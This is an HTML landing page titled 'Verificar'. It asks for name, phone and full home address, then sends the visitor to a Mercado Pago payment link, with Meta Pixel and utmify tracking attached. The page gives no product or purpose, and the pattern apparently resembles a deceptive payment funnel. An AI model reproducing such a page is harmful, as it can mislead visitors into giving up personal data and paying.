<!DOCTYPE html>

<html lang="pt-BR">
<head>
  
  <script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  data-utmify-fast-start
  async
  defer
></script> 

  <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1694560707766599');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=1694560707766599&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->
  
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verificar</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 15
        0vh;
            margin: 0;
        }
        .container {
            background: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 350px;
        }
        h2 {
            margin-bottom: 20px;
            font-size: 1.5em; /* Tamanho do título */
        }
        input {
            width: 100%;
            padding: 8px; /* Reduzi o padding */
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 5px;
            font-size: 1.0em; /* Tamanho do texto nos campos */
        }
        button {
            background: #28a745;
            color: white;
            border: none;
            padding: 12px; /* Reduzi o padding */
            width: 105%;
            border-radius: 5px;
            cursor: pointer;
            font-size: 1em; /* Tamanho do texto no botão */
        }
        button:hover {
            background: #218838;
        }
        .banner {
            max-width: 100%;
            height: auto;
            margin-bottom: 20px;
        }
        label {
            font-weight: bold;
            display: block;
            margin: 5px 0;
            font-size: 0em; /* Tamanho do texto nos rótulos */
        }
    </style>
    <script>
        function redirecionar(event) {
            event.preventDefault();
            window.location.href = 'https://mpago.la/1m6UvFo';
        }
    </script>
</head>
<body>
    <nav class="navbar" style="padding-top: 20px;">
        <div class="menu-icon" style="padding-left: -5%;">
            <img fetchpriority="high" decoding="async" width="420" height="126" src="images/7tYoRmTkKwTC.webp" alt="np">
        </div>
        <div class="logo-central"></div>
        <div class="menu-icon" style="padding-right: -5%;"></div>
    </nav>

    <div class="container">
        <h2></h2>
        <form action="#" method="POST" onsubmit="redirecionar(event)">
            <label>Su nombre</label>
            <input type="text" name="nombre" placeholder="
Su nombre" required>

            <label>Tu teléfono</label>
            <input type="tel" name="teléfono" placeholder="Tu teléfono" required>

            <label>Estado</label>
            <input type="text" name="estado" placeholder="Estado" required>

            <label>Ciudad</label>
            <input type="text" name="ciudad" placeholder="Ciudad" required>

            <label>Vecindario</label>
            <input type="text" name="vecindario" placeholder="Vecindario" required>

            <label>Camino</label>
            <input type="text" name="camino" placeholder="Camino" required>

            <label>Número da Casa</label>
            <input type="text" name="numero" placeholder="Número da casa" required>

            <label>Punto de referencia</label>
            <input type="text" name="punto_de_referencia" placeholder="
Punto de referencia">

            <button type="submit">Continuar</button>
        </form>
    </div>

    <img src="images/imagens.jpg" width="390" height="250" alt="Imagem banner" class="banner">

    <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1694560707766599');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=1694560707766599&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->
    
</body>
</html>
